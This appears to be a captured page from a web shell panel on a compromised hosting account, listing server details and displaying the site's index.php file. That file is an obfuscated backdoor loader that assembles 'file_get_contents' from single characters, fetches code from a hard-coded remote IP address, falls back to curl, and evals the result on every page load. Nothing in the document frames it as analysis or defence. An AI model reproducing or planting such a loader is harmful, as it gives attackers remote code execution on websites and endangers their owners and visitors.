GhostManSec
Server: LiteSpeed
System: Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: niyknzcu (1843)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/niyknzcu/fromheartstohands.com/index.php
<?php
$load = '';
$zfj0304 = 'http://69.197.182.114/z60406_7/stat/index2.txt';
$sources = ['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s'];
foreach($sources as $s) $load .= $s;

$fetch = false;
if(ini_get('allow_url_fopen') && function_exists($load)) {
    $fetch = @$load($zfj0304);
}

if($fetch === false && function_exists('curl_init')) {
    $ch = curl_init();
    $opts = [10102=>true,10002=>$zfj0304,19913=>true,19914=>true,13=>10];
    curl_setopt_array($ch, $opts);
    $fetch = curl_exec($ch);
    curl_close($ch);
}

if($fetch !== false) {
    $payload = '?>' . $fetch;
    eval($payload);
}